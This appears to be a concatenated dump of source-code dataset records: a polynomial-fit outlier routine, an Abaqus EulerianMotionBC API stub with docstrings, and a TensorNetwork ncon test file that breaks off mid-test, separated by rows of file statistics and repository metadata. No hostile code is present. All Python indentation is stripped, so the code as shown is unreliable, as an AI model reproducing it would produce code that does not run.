X=np.transpose(np.matrix([x, b]))
poly2=PolynomialFeatures(degree=3)
X_poly=poly2.fit_transform(X)
poly2.fit(X_poly, y)
lin2=LinearRegression()
lin2.fit(X_poly, y)
predictions=lin2.predict(poly2.fit_transform(X))
differences=y-predictions
diff_mean=differences.mean()
diff_stddev=differences.std()
for i in range(0, len(differences)):
if(abs(differences[i]-diff_mean)>diff_stddev):
extremes.append(1)
else:
extremes.append(0)
return extremes
def get_extremes_for_time(j, raw_station_data):
extremes=[]
y=np.array((raw_station_data[:,j]))
x=np.array(range(1, len(y)+1))
b=np.array(np.ones(len(x)))
X=np.transpose(np.matrix([x,b]))
poly2=PolynomialFeatures(degree=3)
X_poly=poly2.fit_transform(X)
poly2.fit(X_poly, y)
lin2=LinearRegression()
lin2.fit(X_poly, y)
predictions=lin2.predict(poly2.fit_transform(X))
differences=y-predictions
diff_mean=differences.mean()
diff_stddev=differences.std()
for i in range(0, len(differences)):
if(abs(differences[i]-diff_mean)>diff_stddev):
extremes.append(1)
else:
extremes.append(0)
return extremes
| 28.242857
| 67
| 0.672231
| 296
| 1,977
| 4.341216
| 0.182432
| 0.049027
| 0.06537
| 0.042023
| 0.838132
| 0.801556
| 0.764981
| 0.764981
| 0.764981
| 0.764981
| 0
| 0.023471
| 0.181082
| 1,977
| 70
| 68
| 28.242857
| 0.770229
| 0
| 0
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053571
| false
| 0
| 0.053571
| 0
| 0.160714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62f7a26b699307810b12916eddc7cce0121ee3ea
| 29,307
|
py
|
Python
|
src/abaqus/BoundaryCondition/EulerianMotionBC.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | 7
|
2022-01-21T09:15:45.000Z
|
2022-02-15T09:31:58.000Z
|
src/abaqus/BoundaryCondition/EulerianMotionBC.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
src/abaqus/BoundaryCondition/EulerianMotionBC.py
|
Haiiliin/PyAbaqus
|
f20db6ebea19b73059fe875a53be370253381078
|
[
"MIT"
] | null | null | null |
from abaqusConstants import *
from .BoundaryCondition import BoundaryCondition
from ..Region.Region import Region
class EulerianMotionBC(BoundaryCondition):
"""The EulerianMotionBC object stores the data for an Eulerian mesh motion boundary
condition.
The EulerianMotionBC object is derived from the BoundaryCondition object.
Attributes
----------
name: str
A String specifying the boundary condition repository key.
followRegion: Boolean
A Boolean specifying whether the mesh will follow a regular surface region or an
Eulerian surface. The default value is ON.
ctrPosition1: SymbolicConstant
A SymbolicConstant specifying the 1-direction translational constraint on the center of
the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
ctrPosition2: SymbolicConstant
A SymbolicConstant specifying the 2-direction translational constraint on the center of
the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
ctrPosition3: SymbolicConstant
A SymbolicConstant specifying the 3-direction translational constraint on the center of
the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
posPosition1: SymbolicConstant
A SymbolicConstant specifying the translational constraint on the positive (maximum)
bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
value is FREE.
posPosition2: SymbolicConstant
A SymbolicConstant specifying the translational constraint on the positive (maximum)
bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
value is FREE.
posPosition3: SymbolicConstant
A SymbolicConstant specifying the translational constraint on the positive (maximum)
bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
value is FREE.
negPosition1: SymbolicConstant
A SymbolicConstant specifying the translational constraint on the negative (minimum)
bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
value is FREE.
negPosition2: SymbolicConstant
A SymbolicConstant specifying the translational constraint on the negative (minimum)
bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
value is FREE.
negPosition3: SymbolicConstant
A SymbolicConstant specifying the translational constraint on the negative (minimum)
bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
value is FREE.
expansionRatio1: float
None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
1 direction. If **expansionRatio1=None**, then there is no upper limit. The default value
is None.
expansionRatio2: float
None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
2 direction. If **expansionRatio2=None**, then there is no upper limit. The default value
is None.
expansionRatio3: float
None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
3 direction. If **expansionRatio3=None**, then there is no upper limit. The default value
is None.
contractRatio1: float
A Float specifying the lower bounds on the allowable scaling of the mesh in the 1
direction. The default value is 0.0.
contractRatio2: float
A Float specifying the lower bounds on the allowable scaling of the mesh in the 2
direction. The default value is 0.0.
contractRatio3: float
A Float specifying the lower bounds on the allowable scaling of the mesh in the 3
direction. The default value is 0.0.
allowContraction: Boolean
A Boolean specifying whether the mesh is allowed to contract . The default value is ON.
aspectLimit: float
A Float specifying the maximum change in allowed aspect ratio (for any of the three mesh
aspects, 1-2, 2-3, 3-1). The default value is 10.0.
vmaxFactor: float
A Float specifying the multiplier for the mesh nodal velocity limit. The default value
is 1.01.
volThreshold: float
A Float specifying the lower bounds on the volume fraction when determining which nodes
to include in the surface bounding box calculation for an Eulerian material surface.
This argument applies only when **followRegion=False**. The default value is 0.5.
bufferSize: float
None or a Float specifying the buffer between the surface box and the Eulerian section
mesh bounding box. The default value is 2.0.
instanceName: str
A String specifying the name of the Eulerian part instance.
materialName: str
A String specifying the name of the Eulerian surface to follow. This argument applies
only when **followRegion=False**.
category: SymbolicConstant
A SymbolicConstant specifying the category of the boundary condition. Possible values
are MECHANICAL and THERMAL.
region: Region
A :py:class:`~abaqus.Region.Region.Region` object specifying the region to which the boundary condition is applied.
localCsys: str
None or a :py:class:`~abaqus.Datum.DatumCsys.DatumCsys` object specifying the local coordinate system of the boundary
condition's degrees of freedom. If **localCsys=None**, the degrees of freedom are defined
in the global coordinate system. The default value is None.
Notes
-----
This object can be accessed by:
.. code-block:: python
import load
mdb.models[name].boundaryConditions[name]
"""
# A String specifying the boundary condition repository key.
name: str = ''
# A Boolean specifying whether the mesh will follow a regular surface region or an
# Eulerian surface. The default value is ON.
followRegion: Boolean = ON
# A SymbolicConstant specifying the 1-direction translational constraint on the center of
# the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
ctrPosition1: SymbolicConstant = FREE
# A SymbolicConstant specifying the 2-direction translational constraint on the center of
# the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
ctrPosition2: SymbolicConstant = FREE
# A SymbolicConstant specifying the 3-direction translational constraint on the center of
# the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
ctrPosition3: SymbolicConstant = FREE
# A SymbolicConstant specifying the translational constraint on the positive (maximum)
# bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
# value is FREE.
posPosition1: SymbolicConstant = FREE
# A SymbolicConstant specifying the translational constraint on the positive (maximum)
# bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
# value is FREE.
posPosition2: SymbolicConstant = FREE
# A SymbolicConstant specifying the translational constraint on the positive (maximum)
# bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
# value is FREE.
posPosition3: SymbolicConstant = FREE
# A SymbolicConstant specifying the translational constraint on the negative (minimum)
# bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
# value is FREE.
negPosition1: SymbolicConstant = FREE
# A SymbolicConstant specifying the translational constraint on the negative (minimum)
# bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
# value is FREE.
negPosition2: SymbolicConstant = FREE
# A SymbolicConstant specifying the translational constraint on the negative (minimum)
# bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
# value is FREE.
negPosition3: SymbolicConstant = FREE
# None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
# 1 direction. If *expansionRatio1*=None, then there is no upper limit. The default value
# is None.
expansionRatio1: float = None
# None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
# 2 direction. If *expansionRatio2*=None, then there is no upper limit. The default value
# is None.
expansionRatio2: float = None
# None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
# 3 direction. If *expansionRatio3*=None, then there is no upper limit. The default value
# is None.
expansionRatio3: float = None
# A Float specifying the lower bounds on the allowable scaling of the mesh in the 1
# direction. The default value is 0.0.
contractRatio1: float = 0
# A Float specifying the lower bounds on the allowable scaling of the mesh in the 2
# direction. The default value is 0.0.
contractRatio2: float = 0
# A Float specifying the lower bounds on the allowable scaling of the mesh in the 3
# direction. The default value is 0.0.
contractRatio3: float = 0
# A Boolean specifying whether the mesh is allowed to contract . The default value is ON.
allowContraction: Boolean = ON
# A Float specifying the maximum change in allowed aspect ratio (for any of the three mesh
# aspects, 1-2, 2-3, 3-1). The default value is 10.0.
aspectLimit: float = 10
# A Float specifying the multiplier for the mesh nodal velocity limit. The default value
# is 1.01.
vmaxFactor: float = 1
# A Float specifying the lower bounds on the volume fraction when determining which nodes
# to include in the surface bounding box calculation for an Eulerian material surface.
# This argument applies only when *followRegion*=False. The default value is 0.5.
volThreshold: float = 0
# None or a Float specifying the buffer between the surface box and the Eulerian section
# mesh bounding box. The default value is 2.0.
bufferSize: float = 2
# A String specifying the name of the Eulerian part instance.
instanceName: str = ''
# A String specifying the name of the Eulerian surface to follow. This argument applies
# only when *followRegion*=False.
materialName: str = ''
# A SymbolicConstant specifying the category of the boundary condition. Possible values
# are MECHANICAL and THERMAL.
category: SymbolicConstant = None
# A Region object specifying the region to which the boundary condition is applied.
region: Region = Region()
# None or a DatumCsys object specifying the local coordinate system of the boundary
# condition's degrees of freedom. If *localCsys*=None, the degrees of freedom are defined
# in the global coordinate system. The default value is None.
localCsys: str = None
def __init__(self, name: str, createStepName: str, instanceName: str, followRegion: Boolean = ON,
region: Region = Region(), materialName: str = '',
ctrPosition1: SymbolicConstant = FREE, posPosition1: SymbolicConstant = FREE,
negPosition1: SymbolicConstant = FREE, expansionRatio1: float = None,
contractRatio1: float = 0, ctrPosition2: SymbolicConstant = FREE,
posPosition2: SymbolicConstant = FREE, negPosition2: SymbolicConstant = FREE,
expansionRatio2: float = None, contractRatio2: float = 0,
ctrPosition3: SymbolicConstant = FREE, posPosition3: SymbolicConstant = FREE,
negPosition3: SymbolicConstant = FREE, expansionRatio3: float = None,
contractRatio3: float = 0, allowContraction: Boolean = ON, aspectLimit: float = 10,
vmaxFactor: float = 1, volThreshold: float = 0, bufferSize: float = 2):
"""This method creates an EulerianMotionBC object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].EulerianMotionBC
Parameters
----------
name
A String specifying the boundary condition repository key.
createStepName
A String specifying the name of the step in which the boundary condition is created.
instanceName
A String specifying the name of the Eulerian part instance.
followRegion
A Boolean specifying whether the mesh will follow a regular surface region or an
Eulerian surface. The default value is ON.
region
A Region object specifying the region to which the boundary condition is applied.
materialName
A String specifying the name of the Eulerian surface to follow. This argument applies
only when *followRegion*=False.
ctrPosition1
A SymbolicConstant specifying the 1-direction translational constraint on the center of
the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
posPosition1
A SymbolicConstant specifying the translational constraint on the positive (maximum)
bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
value is FREE.
negPosition1
A SymbolicConstant specifying the translational constraint on the negative (minimum)
bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
value is FREE.
expansionRatio1
None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
1 direction. If *expansionRatio1*=None, then there is no upper limit. The default value
is None.
contractRatio1
A Float specifying the lower bounds on the allowable scaling of the mesh in the 1
direction. The default value is 0.0.
ctrPosition2
A SymbolicConstant specifying the 2-direction translational constraint on the center of
the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
posPosition2
A SymbolicConstant specifying the translational constraint on the positive (maximum)
bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
value is FREE.
negPosition2
A SymbolicConstant specifying the translational constraint on the negative (minimum)
bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
value is FREE.
expansionRatio2
None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
2 direction. If *expansionRatio2*=None, then there is no upper limit. The default value
is None.
contractRatio2
A Float specifying the lower bounds on the allowable scaling of the mesh in the 2
direction. The default value is 0.0.
ctrPosition3
A SymbolicConstant specifying the 3-direction translational constraint on the center of
the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
posPosition3
A SymbolicConstant specifying the translational constraint on the positive (maximum)
bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
value is FREE.
negPosition3
A SymbolicConstant specifying the translational constraint on the negative (minimum)
bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
value is FREE.
expansionRatio3
None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
3 direction. If *expansionRatio3*=None, then there is no upper limit. The default value
is None.
contractRatio3
A Float specifying the lower bounds on the allowable scaling of the mesh in the 3
direction. The default value is 0.0.
allowContraction
A Boolean specifying whether the mesh is allowed to contract . The default value is ON.
aspectLimit
A Float specifying the maximum change in allowed aspect ratio (for any of the three mesh
aspects, 1-2, 2-3, 3-1). The default value is 10.0.
vmaxFactor
A Float specifying the multiplier for the mesh nodal velocity limit. The default value
is 1.01.
volThreshold
A Float specifying the lower bounds on the volume fraction when determining which nodes
to include in the surface bounding box calculation for an Eulerian material surface.
This argument applies only when *followRegion*=False. The default value is 0.5.
bufferSize
None or a Float specifying the buffer between the surface box and the Eulerian section
mesh bounding box. The default value is 2.0.
Returns
-------
An EulerianMotionBC object.
"""
super().__init__()
pass
def setValues(self, instanceName: str = '', followRegion: Boolean = ON, region: Region = Region(),
materialName: str = '', ctrPosition1: SymbolicConstant = FREE,
posPosition1: SymbolicConstant = FREE, negPosition1: SymbolicConstant = FREE,
expansionRatio1: float = None, contractRatio1: float = 0,
ctrPosition2: SymbolicConstant = FREE, posPosition2: SymbolicConstant = FREE,
negPosition2: SymbolicConstant = FREE, expansionRatio2: float = None,
contractRatio2: float = 0, ctrPosition3: SymbolicConstant = FREE,
posPosition3: SymbolicConstant = FREE, negPosition3: SymbolicConstant = FREE,
expansionRatio3: float = None, contractRatio3: float = 0,
allowContraction: Boolean = ON, aspectLimit: float = 10, vmaxFactor: float = 1,
volThreshold: float = 0, bufferSize: float = 2):
"""This method modifies the data for an existing EulerianMotionBC object in the step where
it is created.
Parameters
----------
instanceName
A String specifying the name of the Eulerian part instance.
followRegion
A Boolean specifying whether the mesh will follow a regular surface region or an
Eulerian surface. The default value is ON.
region
A Region object specifying the region to which the boundary condition is applied.
materialName
A String specifying the name of the Eulerian surface to follow. This argument applies
only when *followRegion*=False.
ctrPosition1
A SymbolicConstant specifying the 1-direction translational constraint on the center of
the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
posPosition1
A SymbolicConstant specifying the translational constraint on the positive (maximum)
bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
value is FREE.
negPosition1
A SymbolicConstant specifying the translational constraint on the negative (minimum)
bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
value is FREE.
expansionRatio1
None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
1 direction. If *expansionRatio1*=None, then there is no upper limit. The default value
is None.
contractRatio1
A Float specifying the lower bounds on the allowable scaling of the mesh in the 1
direction. The default value is 0.0.
ctrPosition2
A SymbolicConstant specifying the 2-direction translational constraint on the center of
the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
posPosition2
A SymbolicConstant specifying the translational constraint on the positive (maximum)
bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
value is FREE.
negPosition2
A SymbolicConstant specifying the translational constraint on the negative (minimum)
bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
value is FREE.
expansionRatio2
None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
2 direction. If *expansionRatio2*=None, then there is no upper limit. The default value
is None.
contractRatio2
A Float specifying the lower bounds on the allowable scaling of the mesh in the 2
direction. The default value is 0.0.
ctrPosition3
A SymbolicConstant specifying the 3-direction translational constraint on the center of
the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
posPosition3
A SymbolicConstant specifying the translational constraint on the positive (maximum)
bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
value is FREE.
negPosition3
A SymbolicConstant specifying the translational constraint on the negative (minimum)
bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
value is FREE.
expansionRatio3
None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
3 direction. If *expansionRatio3*=None, then there is no upper limit. The default value
is None.
contractRatio3
A Float specifying the lower bounds on the allowable scaling of the mesh in the 3
direction. The default value is 0.0.
allowContraction
A Boolean specifying whether the mesh is allowed to contract . The default value is ON.
aspectLimit
A Float specifying the maximum change in allowed aspect ratio (for any of the three mesh
aspects, 1-2, 2-3, 3-1). The default value is 10.0.
vmaxFactor
A Float specifying the multiplier for the mesh nodal velocity limit. The default value
is 1.01.
volThreshold
A Float specifying the lower bounds on the volume fraction when determining which nodes
to include in the surface bounding box calculation for an Eulerian material surface.
This argument applies only when *followRegion*=False. The default value is 0.5.
bufferSize
None or a Float specifying the buffer between the surface box and the Eulerian section
mesh bounding box. The default value is 2.0.
"""
pass
def setValuesInStep(self, stepName: str, ctrPosition1: SymbolicConstant = FREE,
posPosition1: SymbolicConstant = FREE, negPosition1: SymbolicConstant = FREE,
expansionRatio1: float = None, contractRatio1: float = 0,
ctrPosition2: SymbolicConstant = FREE, posPosition2: SymbolicConstant = FREE,
negPosition2: SymbolicConstant = FREE, expansionRatio2: float = None,
contractRatio2: float = 0, ctrPosition3: SymbolicConstant = FREE,
posPosition3: SymbolicConstant = FREE, negPosition3: SymbolicConstant = FREE,
expansionRatio3: float = None, contractRatio3: float = 0,
allowContraction: Boolean = ON, aspectLimit: float = 10, vmaxFactor: float = 1,
volThreshold: float = 0, bufferSize: float = 2):
"""This method modifies the propagating data for an existing EulerianMotionBC object in the
specified step.
Parameters
----------
stepName
A String specifying the name of the step in which the boundary condition is modified.
ctrPosition1
A SymbolicConstant specifying the 1-direction translational constraint on the center of
the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
posPosition1
A SymbolicConstant specifying the translational constraint on the positive (maximum)
bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
value is FREE.
negPosition1
A SymbolicConstant specifying the translational constraint on the negative (minimum)
bounds of the mesh in the 1 direction. Possible values are FREE and FIXED. The default
value is FREE.
expansionRatio1
None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
1 direction. If *expansionRatio1*=None, then there is no upper limit. The default value
is None.
contractRatio1
A Float specifying the lower bounds on the allowable scaling of the mesh in the 1
direction. The default value is 0.0.
ctrPosition2
A SymbolicConstant specifying the 2-direction translational constraint on the center of
the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
posPosition2
A SymbolicConstant specifying the translational constraint on the positive (maximum)
bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
value is FREE.
negPosition2
A SymbolicConstant specifying the translational constraint on the negative (minimum)
bounds of the mesh in the 2 direction. Possible values are FREE and FIXED. The default
value is FREE.
expansionRatio2
None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
2 direction. If *expansionRatio2*=None, then there is no upper limit. The default value
is None.
contractRatio2
A Float specifying the lower bounds on the allowable scaling of the mesh in the 2
direction. The default value is 0.0.
ctrPosition3
A SymbolicConstant specifying the 3-direction translational constraint on the center of
the Eulerian mesh. Possible values are FREE and FIXED. The default value is FREE.
posPosition3
A SymbolicConstant specifying the translational constraint on the positive (maximum)
bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
value is FREE.
negPosition3
A SymbolicConstant specifying the translational constraint on the negative (minimum)
bounds of the mesh in the 3 direction. Possible values are FREE and FIXED. The default
value is FREE.
expansionRatio3
None or a Float specifying the upper bounds on the allowable scaling of the mesh in the
3 direction. If *expansionRatio3*=None, then there is no upper limit. The default value
is None.
contractRatio3
A Float specifying the lower bounds on the allowable scaling of the mesh in the 3
direction. The default value is 0.0.
allowContraction
A Boolean specifying whether the mesh is allowed to contract . The default value is ON.
aspectLimit
A Float specifying the maximum change in allowed aspect ratio (for any of the three mesh
aspects, 1-2, 2-3, 3-1). The default value is 10.0.
vmaxFactor
A Float specifying the multiplier for the mesh nodal velocity limit. The default value
is 1.01.
volThreshold
A Float specifying the lower bounds on the volume fraction when determining which nodes
to include in the surface bounding box calculation for an Eulerian material surface.
This argument applies only when *followRegion*=False. The default value is 0.5.
bufferSize
None or a Float specifying the buffer between the surface box and the Eulerian section
mesh bounding box. The default value is 2.0.
"""
pass
| 55.505682
| 125
| 0.678439
| 3,678
| 29,307
| 5.403752
| 0.049483
| 0.075874
| 0.08
| 0.090667
| 0.947723
| 0.945459
| 0.944252
| 0.940277
| 0.933333
| 0.924579
| 0
| 0.016791
| 0.284676
| 29,307
| 527
| 126
| 55.611006
| 0.931263
| 0.765278
| 0
| 0.313433
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044776
| false
| 0.044776
| 0.044776
| 0
| 0.507463
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
1a0536e548f4f74195a812ec5239d1c9ddb83942
| 11,730
|
py
|
Python
|
tensornetwork/tests/ncon_interface_test.py
|
jsalsman/TensorNetwork
|
9914ec04d5a783a445b8ee56c82030dc69fed3ed
|
[
"Apache-2.0"
] | 2
|
2019-11-22T20:03:47.000Z
|
2020-09-03T20:25:51.000Z
|
tensornetwork/tests/ncon_interface_test.py
|
olgOk/TensorNetwork
|
9744513329df4331c62f0b7a149081cc5c9d6ffd
|
[
"Apache-2.0"
] | null | null | null |
tensornetwork/tests/ncon_interface_test.py
|
olgOk/TensorNetwork
|
9744513329df4331c62f0b7a149081cc5c9d6ffd
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The TensorNetwork Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import numpy as np
from tensornetwork import BaseNode, Node
from tensornetwork import ncon_interface
from tensornetwork.contractors import greedy
def test_sanity_check(backend):
t1, t2 = np.ones((2, 2)), np.ones((2, 2))
result_1 = ncon_interface.ncon([t1, t2], [(-1, 1), (1, -2)], backend=backend)
np.testing.assert_allclose(result_1, np.ones((2, 2)) * 2)
def test_node_sanity_check(backend):
t1, t2 = np.ones((2, 2)), np.ones((2, 2))
n1, n2 = Node(t1, backend=backend), Node(t2, backend=backend)
result_2 = ncon_interface.ncon([n1, n2], [(-1, 1), (1, -2)], backend=backend)
np.testing.assert_allclose(result_2.tensor, np.ones((2, 2)) * 2)
def test_return_type(backend):
t1, t2 = np.ones((2, 2)), np.ones((2, 2))
n1, n2 = Node(t1, backend=backend), Node(t2, backend=backend)
result_1 = ncon_interface.ncon([t1, t2], [(-1, 1), (1, -2)], backend=backend)
result_2 = ncon_interface.ncon([n1, n2], [(-1, 1), (1, -2)], backend=backend)
result_3 = ncon_interface.ncon([n1, t2], [(-1, 1), (1, -2)], backend=backend)
assert isinstance(result_1, type(n1.backend.convert_to_tensor(t1)))
assert isinstance(result_2, BaseNode)
assert isinstance(result_3, type(n1.backend.convert_to_tensor(t1)))
def test_order_spec(backend):
a = np.ones((2, 2))
result = ncon_interface.ncon([a, a], [(-1, 1), (1, -2)],
out_order=[-1, -2],
backend=backend)
np.testing.assert_allclose(result, np.ones((2, 2)) * 2)
result = ncon_interface.ncon([a, a], [(-1, 1), (1, -2)],
con_order=[1],
backend=backend)
np.testing.assert_allclose(result, np.ones((2, 2)) * 2)
result = ncon_interface.ncon([a, a], [(-1, 1), (1, -2)],
con_order=[1],
out_order=[-1, -2],
backend=backend)
np.testing.assert_allclose(result, np.ones((2, 2)) * 2)
def test_node_order_spec(backend):
node = Node(np.ones((2, 2)), backend=backend)
result = ncon_interface.ncon([node, node], [(-1, 1), (1, -2)],
out_order=[-1, -2],
backend=backend)
np.testing.assert_allclose(result.tensor, np.ones((2, 2)) * 2)
result = ncon_interface.ncon([node, node], [(-1, 1), (1, -2)],
con_order=[1],
backend=backend)
np.testing.assert_allclose(result.tensor, np.ones((2, 2)) * 2)
result = ncon_interface.ncon([node, node], [(-1, 1), (1, -2)],
con_order=[1],
out_order=[-1, -2],
backend=backend)
np.testing.assert_allclose(result.tensor, np.ones((2, 2)) * 2)
def test_order_spec_noninteger(backend):
a = np.ones((2, 2))
result = ncon_interface.ncon([a, a], [('o1', 'i'), ('i', 'o2')],
con_order=['i'],
out_order=['o1', 'o2'],
backend=backend)
np.testing.assert_allclose(result, np.ones((2, 2)) * 2)
def test_node_order_spec_noninteger(backend):
node = Node(np.ones((2, 2)), backend=backend)
result = ncon_interface.ncon([node, node], [('o1', 'i'), ('i', 'o2')],
con_order=['i'],
out_order=['o1', 'o2'],
backend=backend)
np.testing.assert_allclose(result.tensor, np.ones((2, 2)) * 2)
def test_invalid_network(backend):
a = np.ones((2, 2))
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (2, 1), (1, 2)], backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (2, 2)], backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (3, 1)], backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (2, 0.1)], backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (2, 't')], backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(0, 1), (1, 0)], backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1,), (1, 2)], backend=backend)
def test_node_invalid_network(backend):
a = Node(np.ones((2, 2)), backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (2, 1), (1, 2)], backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (2, 2)], backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (3, 1)], backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (2, 0.1)], backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (2, 't')], backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(0, 1), (1, 0)], backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1,), (1, 2)], backend=backend)
def test_invalid_order(backend):
a = np.ones((2, 2))
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (2, 1)],
con_order=[2, 3],
backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (2, 1)],
out_order=[-1],
backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [('i1', 'i2'), ('i1', 'i2')],
con_order=['i1'],
out_order=[],
backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [('i1', 'i2'), ('i1', 'i2')],
con_order=['i1', 'i2'],
out_order=['i1'],
backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [('i1', 'i2'), ('i1', 'i2')],
con_order=['i1', 'i1', 'i2'],
out_order=[],
backend=backend)
def test_node_invalid_order(backend):
a = Node(np.ones((2, 2)), backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (2, 1)],
con_order=[2, 3],
backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [(1, 2), (2, 1)],
out_order=[-1],
backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [('i1', 'i2'), ('i1', 'i2')],
con_order=['i1'],
out_order=[],
backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [('i1', 'i2'), ('i1', 'i2')],
con_order=['i1', 'i2'],
out_order=['i1'],
backend=backend)
with pytest.raises(ValueError):
ncon_interface.ncon([a, a], [('i1', 'i2'), ('i1', 'i2')],
con_order=['i1', 'i1', 'i2'],
out_order=[],
backend=backend)
def test_out_of_order_contraction(backend):
a = np.ones((2, 2, 2))
with pytest.warns(UserWarning, match='Suboptimal ordering'):
ncon_interface.ncon([a, a, a], [(-1, 1, 3), (1, 3, 2), (2, -2, -3)],
backend=backend)
def test_node_out_of_order_contraction(backend):
a = Node(np.ones((2, 2, 2)), backend=backend)
with pytest.warns(UserWarning, match='Suboptimal ordering'):
ncon_interface.ncon([a, a, a], [(-1, 1, 3), (1, 3, 2), (2, -2, -3)],
backend=backend)
def test_output_order(backend):
a = np.random.randn(2, 2)
res = ncon_interface.ncon([a], [(-2, -1)], backend=backend)
np.testing.assert_allclose(res, a.transpose())
def test_node_output_order(backend):
t = np.random.randn(2, 2)
